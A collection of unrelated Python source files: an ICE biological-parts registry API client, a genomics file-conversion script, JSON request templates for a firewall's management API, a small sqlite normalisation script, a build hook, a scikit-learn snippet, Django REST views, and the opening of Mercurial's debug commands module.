"principalInvestigatorEmail": "pi_email",
"principalInvestigatorId": "pi_id",
"publicRead": "public_read",
"recordId": "uuid",
"selectionMarkers": "selection_markers",
"shortDescription": "short_description",
"viewCount": "view_count",
}
JSON_TYPE = "PART"
def __init__(self, **kwargs):
super().__init__(**kwargs)
# these things should be lists if not included in inputs
list_types = (
"access_permissions",
"keywords",
"linked_parts",
"links",
"parents",
)
for t in list_types:
if getattr(self, t, None) is None:
setattr(self, t, [])
@staticmethod
def of(json_dict, silence_warnings=False):
"""
Factory method for creating a Part from a JSON dictionary received from ICE.
:param json_dict: a dictionary representation of the ICE JSON for this part
:return: an object representing the part, or None if there's none in the input
"""
if not json_dict:
return None
# build up a list of keyword arguments to use in constructing the Entry.
python_params = {}
# linked parts
linked_parts = [Entry.of(part) for part in json_dict.get("linkedParts", [])]
python_params["linked_parts"] = linked_parts
# parents
parents = [Entry.of(parent) for parent in json_dict.get("parents", [])]
python_params["parents"] = parents
# set/replace object parameters in the dictionary
already_converted = {"linkedParts", "parents"}
# set objects that have a trivial conversion from JSON to Python,
# changing the style to match Python's snake_case from the ICE's Java-based camelCase
for json_keyword, json_value in json_dict.items():
# skip data that translate to custom Python objects rather than builtin data types
if json_keyword in already_converted:
continue
# TODO: investigate JSON data in this dictionary that we don't
# currently understand / support.
if json_keyword in ["parameters"]:
continue
python_keyword = Entry.KEYWORD_CHANGES.get(json_keyword, json_keyword)
python_params[python_keyword] = json_value
# Note: don't shadow Python builtin 'type'!
part_type = python_params.pop("type", None)
return _construct_part(python_params, part_type, silence_warnings)
def __str__(self):
return f'{self.part_id} / "{self.name}" / ({self.uuid})'
def to_json_dict(self):
# copy all data members into a dictionary
json_dict = self.__dict__.copy()
# reverse the json -> python keyword changes performed during deserialization
for json_keyword, python_keyword in Entry.KEYWORD_CHANGES.items():
value = json_dict.pop(python_keyword, None)
if value:
json_dict[json_keyword] = value
return json_dict
def _construct_part(python_params, part_type, silence_warnings):
# extract strain-specific data, if available. change camel case to snake case.
type_to_class_and_keyword = {
"PLASMID": (Plasmid, "plasmidData"),
"STRAIN": (Strain, "strainData"),
"ARABADOPSIS": (Arabidopsis, "Arabidopsis"),
"PROTEIN": (Protein, "proteinData"),
"PART": (Entry, None),
}
try:
part_class, keyword = type_to_class_and_keyword.get(part_type)
except Exception as e:
raise IceApiException(f"Unsupported type {part_type}") from e
class_data = python_params.pop(keyword, None)
if keyword is None:
# no special handling
pass
elif class_data:
python_params.update(
{
part_class.KEYWORD_CHANGES.get(keyword, keyword): value
for keyword, value in class_data.items()
}
)
elif not silence_warnings:
logger.warning(
"JSON for {class_name} '{part_id}' has type={type}, "
"but no {field_name} field.".format(
class_name=part_class.__name__,
part_id=python_params["part_id"],
type=part_type,
field_name=keyword,
)
)
return part_class(**python_params)
class Strain(Entry):
KEYWORD_CHANGES = {"genotypePhenotype": "genotype_phenotype"}
JSON_TYPE = "STRAIN"
def to_json_dict(self):
json_dict = super().to_json_dict()
# remove strain-specific data from the dictionary and re-package it as in ICE's JSON
host_value = json_dict.pop("host", None)
geno_value = json_dict.pop("genotype_phenotype", None)
strain_data = {}
if host_value:
strain_data["host"] = host_value
if geno_value:
strain_data["genotypePhenotype"] = geno_value
if strain_data:
json_dict["strainData"] = strain_data
return json_dict
class Folder(IceObject):
# build a dict of keywords for translating field names from Java-based conventions used in
# ICE's JSON to Python style names
keyword_changes_dict = {
"folderName": "name",
"count": "entry_count",
"propagatePermission": "propagate_permission",
"canEdit": "can_edit",
"creationTime": "creation_time",
}
def __init__(self, **kwargs):
super().__init__(**kwargs)
# convert entries to Entry objects
self.entries = [Entry.of(entry) for entry in self.entries or []]
@staticmethod
def of(json_dict):
python_object_params = {}
for json_key, value in json_dict.items():
python_keyword = Folder.keyword_changes_dict.get(json_key, json_key)
python_object_params[python_keyword] = value
return Folder(**python_object_params)
def to_json_dict(self):
json_dict = {
java: getattr(self, python)
for java, python in self.keyword_changes_dict.items()
}
json_dict["id"] = self.id
json_dict["entries"] = [entry.to_json_dict() for entry in self.entries]
return json_dict
# Design note: all part-specific params are currently optional so that we can still at least
# capture the part type when the part gets returned from a search without any of its type-specific
# data. TODO: confirm with Hector P. that this is intentional, then make them non-optional if
# needed
class Plasmid(Entry):
KEYWORD_CHANGES = {
"originOfReplication": "origin_of_replication",
"replicatesIn": "replicates_in",
}
JSON_TYPE = "PLASMID"
class Protein(Entry):
KEYWORD_CHANGES = {"geneName": "gene_name"}
JSON_TYPE = "PROTEIN"
class Arabidopsis(Entry):
KEYWORD_CHANGES = {
"harvestDate": "harvest_date",
"seedParents": "seed_parents",
"plantType": "plant_type",
"sentToAbrc": "sent_to_a_brc",
}
JSON_TYPE = "ARABIDOPSIS"
class IceApi(RestApiClient):
"""
Defines the interface to ICE's REST API.
TODO: extremely basic interface to ICE API; should eventually expand to cover more
of the API, modularize (i.e. so others can just import jbei.ice), and document.
"""
# Flag enabling data changes via this RestApiClient instance. When False, any attempts
# to change data will result in an Exception. Data changes are disabled by default to
# prevent accidental data loss or corruption.
write_enabled = False
local_folder_pattern = re.compile(r"^/folders/(\d+)/?$")
web_folder_pattern = re.compile(r"^/partners/(\d+)/folders/(\d+)/?$")
def __init__(self, auth, base_url=ICE_URL, result_limit=15, verify_ssl_cert=True):
"""
Creates a new instance of IceApi
:param auth: the authentication strategy for communication with ICE
:param session: object implementing the Requests API; defaults to Session
:param base_url: the base URL of the ICE install.
:param result_limit: the maximum number of results that can be returned from a single
query. The default is ICE's default limit at the time of writing. Note that ICE
doesn't return paging-related data from its REST API, so to provide consistent
tracking of how results are paged, some value has to be provided.
"""
if not auth:
raise ValueError("A valid authentication mechanism must be provided")
session = Session(auth=auth, verify_ssl_cert=verify_ssl_cert)
super().__init__(base_url, session, result_limit)
def _prevent_write_while_disabled(self):
"""
Throws a RuntimeException if self._enable_write is false. This is part of a
belt-AND-suspenders check for preventing data loss, especially if this code eventually
makes its way into the hands of researchers inexperienced in programming. It's already
prevented at least one accidental data change during EDD script development!
"""
if not self.write_enabled:
raise IceApiException(
"To prevent accidental data loss or corruption, data changes "
"to ICE are disabled. Use write_enabled to allow writes, but "
"please use carefully!"
)
def get_entry(self, entry_id, suppress_errors=False):
"""
Retrieves an ICE entry using any of the unique identifiers: UUID (preferred), part
number (often globally unique, though not enforceably), or locally-unique primary
key. Returns a Part object, or None if no part was found, or if there were
suppressed errors in making the request. Note that this method doesn't currently
support querying the web of registries for entries that aren't stored locally in this ICE
instance.
:param entry_id: the ICE ID for this entry (either the UUID, part number,
locally-unique integer primary key)
:param suppress_errors: true to catch and log exception messages and return
None instead of raising Exceptions.
:return: A Part object representing the response from ICE, or None if an
Exception occurred but suppress_errors was true.
"""
rest_url = f"{self.base_url}/rest/parts/{entry_id}"
try:
response = self.session.get(url=rest_url)
response.raise_for_status()
json_dict = json.loads(response.text)
if json_dict:
return Entry.of(json_dict, False)
except requests.exceptions.Timeout as e:
if not suppress_errors:
raise IceApiException() from e
logger.exception("Timeout requesting part %s: %s", entry_id)
except requests.exceptions.HTTPError as e:
if response.status_code == requests.codes.not_found:
return None
elif not suppress_errors:
raise IceApiException() from e
logger.exception(
"Error fetching part from ICE with entry_id %(entry_id)s. "
'Response = %(status_code)d: "%(msg)s"'
% {
"entry_id": entry_id,
"status_code": response.status_code,
"msg": response.reason,
}
)
return None
def get_folder(self, folder_id, partner_id=None):
"""
Retrieves an ICE folder using its unique identifier.
:param id: the ICE ID for this entry (either the UUID, part number,
locally-unique integer primary key)
:return: A Folder object representing the response from ICE
"""
params = {}
base_url = self.base_url
if not partner_id:
rest_url = f"{base_url}/rest/folders/{folder_id}"
else:
# TODO: this is the observed pattern from the ICE UI, but maybe a more standard,
# URL-only scheme is also supported?
rest_url = f"{base_url}/rest/partners/{partner_id}/folders"
params["folderId"] = folder_id
try:
response = self.session.get(url=rest_url)
if response.status_code == requests.codes.not_found:
return None
response.raise_for_status()
json_dict = json.loads(response.text)
return Folder.of(json_dict)
except Exception as e:
raise IceApiException(f"Failed loading folder {folder_id}") from e
def _init_folder_entries_params(self, folder_id, partner_id=None, sort=None):
params = {}
if not partner_id:
rest_url = f"{self.base_url}/rest/folders/{folder_id}/entries"
else:
rest_url = f"{self.base_url}/rest/partners/{partner_id}/folders/entries"
params["folderId"] = folder_id
if sort:
descending = sort.startswith("-")
params["sort"] = sort[1:] if descending else sort
# cast to lower case for Java ICE
params["asc"] = str(not descending).lower()
params["limit"] = self.result_limit
return rest_url, params
def get_folder_entries(self, folder_id, partner_id=None, sort=None):
"""
Retrieves an ICE folder using its unique identifier, with Entry objects included.
:param id: the ICE ID for this folder
:return: A Part object representing the response from ICE
"""
rest_url, params = self._init_folder_entries_params(folder_id, partner_id, sort)
def fetch_entries(initial):
for entry in initial:
yield entry
offsets = itertools.count(start=self.result_limit, step=self.result_limit)
for offset in offsets:
params["offset"] = offset
response = self.session.get(url=rest_url, params=params)
response.raise_for_status()
page = Folder.of(response.json())
if len(page.entries) == 0:
break
for entry in page.entries:
yield entry
try:
response = self.session.get(url=rest_url, params=params)
if response.status_code == requests.codes.not_found:
return None
response.raise_for_status()
folder = Folder.of(response.json())
# replace entries with a generator that fetches remaining pages on-demand
folder.entries = fetch_entries(folder.entries)
return folder
except Exception as e:
raise IceApiException(f"Failed loading folder entries {folder_id}") from e
def folder_from_url(self, url):
try:
url_parts = self._check_matching_base_url(url)
folder_id, partner_id = self._extract_folder_id(url_parts.path)
return self.get_folder(folder_id, partner_id)
except IceApiException:
raise
except Exception as e:
raise IceApiException(f"Failed to load ICE Folder at {url}") from e
def _check_matching_base_url(self, url):
url_parts = urlparse(str(url).lower().strip())
if not (url_parts.netloc and url_parts.path):
raise IceApiException(
"URL does not match the expected format.",
code=requests.codes.bad_request,
)
my_url_parts = urlparse(self.base_url)
if url_parts.netloc != my_url_parts.netloc:
raise IceApiException(
"URL is in the wrong ICE instance.", code=requests.codes.bad_request
)
return url_parts
def _extract_folder_id(self, path):
match = self.local_folder_pattern.match(path)
folder_id = None
partner_id = None
if match:
folder_id = match.group(1)
else:
match = self.web_folder_pattern.match(path)
if match:
partner_id = match.group(1)
folder_id = match.group(2)
if folder_id is None:
raise IceApiException(
f"Unable to process the URL; must be of the form `{self.base_url}/folders/123`",
code=requests.codes.bad_request,
)
elif partner_id is not None:
raise IceApiException(
"Folders from Web of Registries are not yet supported.",
code=requests.codes.bad_request,
)
return folder_id, partner_id
def search(self, search_terms):
"""
Simple ICE search. Give a search term, get a list of entry dicts.
"""
logger.info(f'Searching for ICE entries using search terms "{search_terms}"')
url = f"{self.base_url}/rest/search"
try:
query_json = json.dumps({"queryString": search_terms})
response = self.session.post(
url,
data=query_json,
headers={"Content-Type": "application/json; charset=utf8"},
)
response.raise_for_status()
results = response.json()
return [record["entryInfo"] for record in results["results"]]
except Exception as e:
raise IceApiException(
f"Could not complete search for {search_terms}"
) from e
def unlink_entry_from_study(self, ice_entry_id, study_url):
"""
Contacts ICE to find and remove all the links from the specified ICE part to the
specified EDD study. In practical use, there will probably only ever be one per
part/study combination.
:param ice_entry_id: the id of the ICE entry whose link to the study
should be removed (either a UUID or the numeric id)
:param study_url: the study URL
:raises RequestException: for any issues making requests to ICE REST API
"""
for link in self.fetch_experiment_links(ice_entry_id):
if link.get("url", None) == study_url:
link_id = link.get("id")
logger.info(f"Deleting link {link_id} from entry {ice_entry_id}")
self.remove_experiment_link(ice_entry_id, link_id)
return
logger.warning(f"No link found for {study_url} in entry {ice_entry_id}")
def fetch_experiment_links(self, ice_entry_id):
try:
response = self.session.get(
f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/"
)
response.raise_for_status()
for link in response.json():
yield link
except Exception as e:
raise IceApiException(
f"Failed to load experiment links from {ice_entry_id}"
) from e
def add_experiment_link(self, ice_entry_id, study_name, study_url):
"""Communicates with ICE to link an ICE entry to an EDD study"""
self._prevent_write_while_disabled()
payload = {"label": study_name, "url": study_url}
try:
response = self.session.post(
f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/",
data=json.dumps(payload),
headers={"Content-Type": "application/json"},
)
response.raise_for_status()
except Exception as e:
raise IceApiException(
f"Failed to add experiment link {study_url} to {ice_entry_id}"
) from e
def remove_experiment_link(self, ice_entry_id, link_id):
"""Removes the specified experiment link from an ICE entry"""
self._prevent_write_while_disabled()
try:
response = self.session.delete(
f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/{link_id}/"
)
response.raise_for_status()
except Exception as e:
raise IceApiException(
f"Failed to remove experiment link {link_id} from {ice_entry_id}"
) from e
|
from ..file_utils import convert_VariantFile_to_IndexedVariantFile, common_filepaths
from .load_utils import parallelize_per_pheno
def run(argv):
parallelize_per_pheno(
get_input_filepaths = lambda pheno: common_filepaths['pheno'](pheno['phenocode']),
get_output_filepaths = lambda pheno: common_filepaths['pheno_gz'](pheno['phenocode']),
convert = convert,
cmd = 'bgzip-phenos',
)
def convert(pheno):
convert_VariantFile_to_IndexedVariantFile(
common_filepaths['pheno'](pheno['phenocode']),
common_filepaths['pheno_gz'](pheno['phenocode'])
)
|
# Copyright (c) 2018 Tsinghuanet, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# TnOS API request format templates.
# About api request message naming regulations:
# Prefix HTTP method
# ADD_XXX --> POST
# SET_XXX --> PUT
# DELETE_XXX --> DELETE
# GET_XXX --> GET
# Login
LOGIN = """
{
"path": "/api/user/login",
"method": "POST",
"body": {
"username": "{{ username }}",
"password": "{{ secretkey }}"
}
}
"""
RELOGIN = """login?redir=%2fapi%2fv2"""
LOGOUT = """
{
"path": "/api/user/logout",
"method": "POST"
}
"""
TOUCH = """
{
"path": "/api/user/touch",
"method": "GET"
}
"""
ADD_SUB_INTF = """
{
"path": "/api/system_interface?vdom=root",
"method": "POST",
"body": {
"binding_zone": "l2zone",
"zone_l2": "l2-trust",
"vlanid": "{{ vlanid }}",
"type": "subinterface",
"interface":"{{ intf_name }}",
"mkey": "{{ intf_name }}.{{ vlanid }}",
"mkey_id": " "
}
}
"""
DEL_SUB_INTF = """
{
"path": "/api/system_interface?vdom=root",
"method": "DELETE",
"body": {
"type": "subinterface",
"mkey": "{{ intf_name }}",
"mkey_id": "{{ id }}"
}
}
"""
GET_INTF_INFO = """
{
"path": "/api/system_interface?vdom=root",
"method": "GET"
}
"""
CFG_INTF = """
{
"path": "/api/system_interface/{{ intf_name }}?vdom=root",
"method": "PUT",
"body": {
"mode": "static",
"binding_zone": "l3zone",
"zone_l3": "trust",
{% if allows is defined %}
"allowaccess": [
{% for allow in allows[:-1] %}
"{{ allow }}",
{% endfor %}
"{{ allows[-1] }}"
],
{% else %}
"allowaccess": [],
{% endif %}
"_id": "{{ intf_name }}",
{% if dns_state is defined %}
"enableDNSproxy": "{{ dns_state }}",
{% else %}
"enableDNSproxy": "disable",
{% endif %}
{% if mtu is defined %}
"mtu": "{{ mtu }}",
{% else %}
"mtu": "1500",
{% endif %}
{% if vlanid is defined %}
"vlanid": "{{ vlanid }}",
{% else %}
"vlanid": " ",
{% endif %}
"interface":"ethernet0",
"type": "{{ type }}",
"ip": "{{ ip_prefix }}",
"mkey": "{{ intf_name }}",
"mkey_id": "{{ id }}"
}
}
"""
ADD_STATIC_ROUTE = """
{
"path": "/api/router_static?vdom=root",
"method": "POST",
"body": {
{% if gw_type is defined %}
"gw_type": "{{ gw_type }}",
{% else %}
"gw_type": "ip",
{% endif %}
{% if gw_ip is defined %}
"gw_ip": "{{ gw_ip }}",
{% endif %}
{% if gw_interface is defined %}
"gw_interface": "{{ gw_interface }}",
{% endif %}
{% if distance is defined %}
"distance": "{{ distance }}",
{% endif %}
"dest": "{{ dest }}",
"netmask": "{{ netmask }}"
}
}
"""
DEL_STATIC_ROUTE = """
{
"path": "/api/router_static?vdom=root",
"method": "DELETE",
"body": {
{% if gw_type is defined %}
"gw_type": "{{ gw_type }}",
{% else %}
"gw_type": "ip",
{% endif %}
{% if gw_ip is defined %}
"gw_ip": "{{ gw_ip }}",
{% endif %}
{% if gw_interface is defined %}
"gw_interface": "{{ gw_interface }}",
{% endif %}
{% if distance is defined %}
"distance": "{{ distance }}",
{% endif %}
"mkey": "{{ dest }}",
"dest": "{{ dest }}",
"netmask": "{{ netmask }}"
}
}
"""
ADD_ADDRESS_ENTRY = """
{
"path": "/api/system_address?vdom=root",
"method": "POST",
"body": {
"mkey": "{{ name }}",
{% if type is defined %}
"type": "{{ type }}",
{% else %}
"type": "ip-prefix",
{% endif %}
{% if ip_prefix is defined %}
"ip-prefix": "{{ ip_prefix }}"
{% else %}
"ip-min": "{{ ip_min }}",
"ip-max": "{{ ip_max }}"
{% endif %}
}
}
"""
DEL_ADDRESS_ENTRY = """
{
"path": "/api/system_address?vdom=root",
"method": "DELETE",
"body": {
"mkey": "{{ name }}"
}
}
"""
ADD_SERVICE_ENTRY = """
{
"path": "/api/system_service?vdom=root",
"method": "POST",
"body": {
{% if desc is defined %}
"description":"{{ desc }}",
{% else %}
"description":"",
{% endif %}
"member": [
{
"destination_port_max":"{{ dst_port_max }}",
"destination_port_min":"{{ dst_port_min }}",
"protocol":"{{ protocol }}",
"source_port_max":"{{ src_port_max }}",
"source_port_min":"{{ src_port_min }}"
}
],
"mkey":"{{ name }}"
}
}
"""
DEL_SERVICE_ENTRY = """
{
"path": "/api/system_service?vdom=root",
"method": "DELETE",
"body": {
{% if desc is defined %}
"description":"{{ desc }}",
{% else %}
"description":"",
{% endif %}
"member": [
{
"destination_port_max":"{{ dst_port_max }}",
"destination_port_min":"{{ dst_port_min }}",
"protocol":"{{ protocol }}",
"source_port_max":"{{ src_port_max }}",
"source_port_min":"{{ src_port_min }}"
}
],
"mkey":"{{ name }}",
"predefine": 0
}
}
"""
ADD_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/?vdom=root",
"method": "POST",
"body": {
"id": "{{ id }}",
{% if desc is defined %}
"description": "{{ desc }}",
{% endif %}
"saddr":"{{ saddr }}",
{% if daddr is defined %}
"daddr": "{{ daddr }}",
{% else %}
"daddr":"Any",
{% endif %}
{% if eif is defined %}
"eif": "{{ eif }}",
{% endif %}
{% if log_flag is defined %}
"log":"{{ log_flag }}",
{% else %}
"log":"disable",
{% endif %}
{% if reverse_flag is defined %}
"reverse":"{{ reverse_flag }}",
{% else %}
"reverse":"disable",
{% endif %}
{% if service is defined %}
"service":"{{ service }}",
{% else %}
"service":"Any",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if sticky_flag is defined %}
"sticky":"{{ sticky_flag }}",
{% else %}
"sticky":"disable",
{% endif %}
{% if trans is defined %}
"trans":"{{ trans }}",
{% else %}
"trans":"trans-to",
{% endif %}
"trans_addr":"{{ trans_addr }}",
{% if trans_mode is defined %}
"trans_mode":"{{ trans_mode }}"
{% else %}
"trans_mode":"dynamicport"
{% endif %}
}
}
"""
DEL_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/?vdom=root",
"method": "DELETE",
"body": {
"id": "{{ id }}",
{% if desc is defined %}
"description": "{{ desc }}",
{% endif %}
"saddr":"{{ saddr }}",
{% if daddr is defined %}
"daddr": "{{ daddr }}",
{% else %}
"daddr":"Any",
{% endif %}
{% if eif is defined %}
"eif": "{{ eif }}",
{% endif %}
{% if log_flag is defined %}
"log":"{{ log_flag }}",
{% else %}
"log":"disable",
{% endif %}
{% if reverse_flag is defined %}
"reverse":"{{ reverse_flag }}",
{% else %}
"reverse":"disable",
{% endif %}
{% if service is defined %}
"service":"{{ service }}",
{% else %}
"service":"Any",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if sticky_flag is defined %}
"sticky":"{{ sticky_flag }}",
{% else %}
"sticky":"disable",
{% endif %}
{% if trans is defined %}
"trans":"{{ trans }}",
{% else %}
"trans":"trans-to",
{% endif %}
"trans_addr":"{{ trans_addr }}",
{% if trans_mode is defined %}
"trans_mode":"{{ trans_mode }}"
{% else %}
"trans_mode":"dynamicport"
{% endif %}
}
}
"""
MOVE_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/move/move?vdom=root&srcKey={{ srcKey }}&move_act={{ action }}&dstKey={{ dstKey }}",
"method": "PUT",
"body": {
"dst":"{{ dstKey }}",
"src":"{{ srcKey }}",
"move_act":"{{ action }}",
"_id":"move"
}
}
"""
ADD_RULE = """
{
"path": "/api/policy_security_rule?vdom=root",
"method": "POST",
"body": {
"id":"{{ id }}",
"action":"{{ action }}",
"mkey":"{{ name }}",
{% if desc is defined %}
"description":"{{ desc }}",
{% endif %}
{% if daddr is defined %}
"daddr": ["{{ daddr }}"],
{% else %}
"daddr":["Any"],
{% endif %}
{% if destinationAddr is defined %}
"destinationAddr":"{{ destinationAddr }}",
{% else %}
"destinationAddr":"address",
{% endif %}
{% if dzone is defined %}
"dzone":"{{ dzone }}",
{% else %}
"dzone":"trust",
{% endif %}
{% if saddr is defined %}
"saddr": ["{{ saddr }}"],
{% else %}
"saddr":["Any"],
{% endif %}
{% if serGroup is defined %}
"serGroup":"{{ serGroup }}",
{% else %}
"serGroup":"address",
{% endif %}
{% if service is defined %}
"service": ["{{ service }}"],
{% else %}
"service":["Any"],
{% endif %}
{% if sourceAddr is defined %}
"sourceAddr":"{{ sourceAddr }}",
{% else %}
"sourceAddr":"address",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if szone is defined %}
"szone":"{{ szone }}"
{% else %}
"szone":"trust"
{% endif %}
}
}
"""
DEL_RULE = """
{
"path": "/api/policy_security_rule?vdom=root",
"method": "DELETE",
"body": {
"id":"{{ id }}",
"action":"{{ action }}",
"mkey":"{{ name }}",
{% if desc is defined %}
"description":"{{ desc }}",
{% endif %}
{% if daddr is defined %}
"daddr": ["{{ daddr }}"],
{% else %}
"daddr":["Any"],
{% endif %}
"daddrgroup":[],
{% if dzone is defined %}
"dzone":"{{ dzone }}",
{% else %}
"dzone":"trust",
{% endif %}
{% if saddr is defined %}
"saddr": ["{{ saddr }}"],
{% else %}
"saddr":["Any"],
{% endif %}
"saddrgroup":[],
{% if service is defined %}
"service": ["{{ service }}"],
{% else %}
"service":["Any"],
{% endif %}
"servicegroup":[],
"sched":[],
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if szone is defined %}
"szone":"{{ szone }}"
{% else %}
"szone":"trust"
{% endif %}
}
}
"""
MOVE_RULE = """
{
"path": "/api/policy_security_rule/move/move?vdom=root&srcKey={{ srcKey }}&move_act={{ action }}&dstKey={{ dstKey }}",
"method": "PUT",
"body": {
"dst":"{{ dstKey }}",
"src":"{{ srcKey }}",
"move_act":"{{ action }}",
"_id":"move"
}
}
"""
|
import sqlite3
import pandas as pd
import numpy
import matplotlib.pyplot as plt
import re
con = sqlite3.connect('works.sqlite')
df = pd.read_csv("works.csv")
cursor = con.cursor()
def clean(field):
return re.sub(r'\<[^>]*\>', '', str(field))
df['skills'] = df['skills'].apply(clean)
df['otherInfo'] = df['otherInfo'].apply(clean)
df.to_sql("works", con, if_exists='append', index=False)
con.commit()
cursor.execute('drop table if exists genders')
cursor.execute('CREATE TABLE genders('
'id INTEGER PRIMARY KEY AUTOINCREMENT,'
'gender TEXT)')
cursor.execute('INSERT INTO genders(gender)'
'SELECT DISTINCT gender'
'FROM works WHERE gender IS NOT NULL')
cursor.execute('ALTER TABLE works'
'ADD COLUMN gender_id INTEGER REFERENCES genders(id)')
cursor.execute('UPDATE works SET gender_id ='
'(SELECT id FROM genders'
'WHERE gender = works.gender)')
cursor.execute('ALTER TABLE works'
'DROP COLUMN gender')
con.commit()
cursor.execute('drop table if exists education')
cursor.execute('CREATE TABLE education'
'(id INTEGER PRIMARY KEY AUTOINCREMENT, '
'level_of_edu TEXT)')
cursor.execute('INSERT INTO education(level_of_edu)'
' SELECT DISTINCT educationType '
'FROM works'
' WHERE educationType IS NOT NULL')
cursor.execute('ALTER TABLE works'
' ADD COLUMN educationType_id INTEGER REFERENCES education(id)')
cursor.execute('UPDATE works'
' SET educationType_id ='
' (SELECT id'
' FROM education'
' WHERE level_of_edu = works.educationType)')
cursor.execute('ALTER TABLE works'
' DROP COLUMN educationType')
con.commit() |
import pathlib
import mypyc.build
def build(setup_kwargs: dict) -> None:
"""
This function is mandatory in order to build the extensions.
"""
project_dir = pathlib.Path(__file__).resolve().parent
ext_modules = [
str(file)
for file in (project_dir / "{{cookiecutter.package_name}}").rglob("*.py")
]
setup_kwargs.update({"ext_modules": mypyc.build.mypycify(ext_modules)})
|
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.linear_model import LogisticRegression
numerical_columns_selector = selector(dtype_exclude=object)
numerical_columns = numerical_columns_selector(data)
preprocessor = make_column_transformer(
(StandardScaler(), numerical_columns),
(OneHotEncoder(handle_unknown="ignore"), categorical_columns),
)
model = make_pipeline(preprocessor, LogisticRegression(max_iter=1_000))
cv_results = cross_validate(model, data, target)
scores = cv_results["test_score"]
print(f"The accuracy is: {scores.mean():.3f} +/- {scores.std():.3f}") |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from v2x_solution.road import models as road_models
class Events(APIView):
def get(self, req, format=None):
# 1. get all events
events = models.Event.objects.all()
serializer = serializers.EventSerializer(events, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
def post(self, req, format=None):
user = req.user
# 1. check query
try:
found_road = road_models.Road.objects.get(name=req.data.get('location'))
except road_models.Road.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
serializer = serializers.EventSerializer(data=req.data)
if serializer.is_valid():
# 2. save event
serializer.save(creator=user, road=found_road)
return Response(status=status.HTTP_201_CREATED)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
class ModerateEvent(APIView):
# find event
def find_event(self, event_id):
try:
found_event = models.Event.objects.get(id=event_id)
return found_event
except models.Event.DoesNotExist:
return None
# select event
def get(self, req, event_id, format=None):
# 1. find event
event = self.find_event(event_id)
if event is None:
return Response(status=status.HTTP_404_NOT_FOUND)
else:
# 2. serialize data
serializer = serializers.EventSerializer(event)
return Response(data=serializer.data, status=status.HTTP_200_OK)
# update event
def put(self, req, event_id, format=None):
# 1. find event
event = self.find_event(event_id)
if event is None:
return Response(status=status.HTTP_404_NOT_FOUND)
# 2. check event's creator
elif event.creator != req.user:
return Response(status.HTTP_401_UNAUTHORIZED)
# 3. check serializer's data
else:
serializer = serializers.EventSerializer(event, data=req.data, partial=True)
if serializer.is_valid():
serializer.save(creator=req.user)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# delete event
def delete(self, req, event_id, format=None):
# 1. find event
event = self.find_event(event_id)
if event is None:
return Response(status=status.HTTP_404_NOT_FOUND)
# 2. check event's creator
elif event.creator != req.user:
return Response(status.HTTP_401_UNAUTHORIZED)
# 3. delete serializer's data
else:
event.delete()
return Response(status=status.HTTP_200_OK)
class Search(APIView):
def get(self, req, format=None):
event_name = req.query_params.get('name', None)
event_time = req.query_params.get('time', None)
event_location = req.query_params.get('location', None)
# 1. if url is /events/search/?name=
# ex: /events/search/?name=행사
if event_name is not None:
events = models.Event.objects.filter(name__istartswith=event_name)
serializer = serializers.EventSerializer(events, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
# 2. url is /events/search/?time=
# ex: /events/search/?time=2018-07-12
if event_time is not None:
events = models.Event.objects.filter(time__istartswith=event_time)
serializer = serializers.EventSerializer(events, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
# 3. url is /events/search/?location=
# ex: /events/search/?location=inha-ro
if event_location is not None:
events = models.Event.objects.filter(road__name__istartswith=event_location)
serializer = serializers.EventSerializer(events, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
# 4. all param is None
return Response(status=status.HTTP_404_NOT_FOUND)
|
from rest_framework import serializers
from .models import Project
class ProjectSerializer(serializers.ModelSerializer):
class Meta:
model = Project
fields = ('title', 'description', 'framework', 'image', 'owner') |
# debugcommands.py - command processing for debug* commands
#
# Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import codecs
import collections
import difflib
import errno
import operator
import os
import random
import re
import socket
import ssl
import stat
import string
import subprocess
import sys
import time
from .i18n import _
from .node import (
bin,
hex,
nullhex,
nullid,
nullrev,
short,
)
from . import (
bundle2,
changegroup,
cmdutil,
color,
context,
dagparser,
encoding,
error,
exchange,
extensions,
filemerge,
filesetlang,
formatter,
hg,
httppeer,
localrepo,
lock as lockmod,
logcmdutil,
merge as mergemod,
obsolete,
obsutil,
phases,
policy,
pvec,
pycompat,
registrar,
repair,
revlog,
revset,
revsetlang,
scmutil,
setdiscovery,
simplemerge,
sshpeer,
sslutil,
streamclone,
templater,
treediscovery,
upgrade,
url as urlmod,
util,
vfs as vfsmod,
wireprotoframing,
wireprotoserver,
wireprotov2peer,
)
from .utils import (
cborutil,
dateutil,
procutil,
stringutil,
)
from .revlogutils import (
deltas as deltautil
)
release = lockmod.release
command = registrar.command()
@command('debugancestor', [], _('[INDEX] REV1 REV2'), optionalrepo=True)
def debugancestor(ui, repo, *args):
"""find the ancestor revision of two revisions in a given index"""
if len(args) == 3:
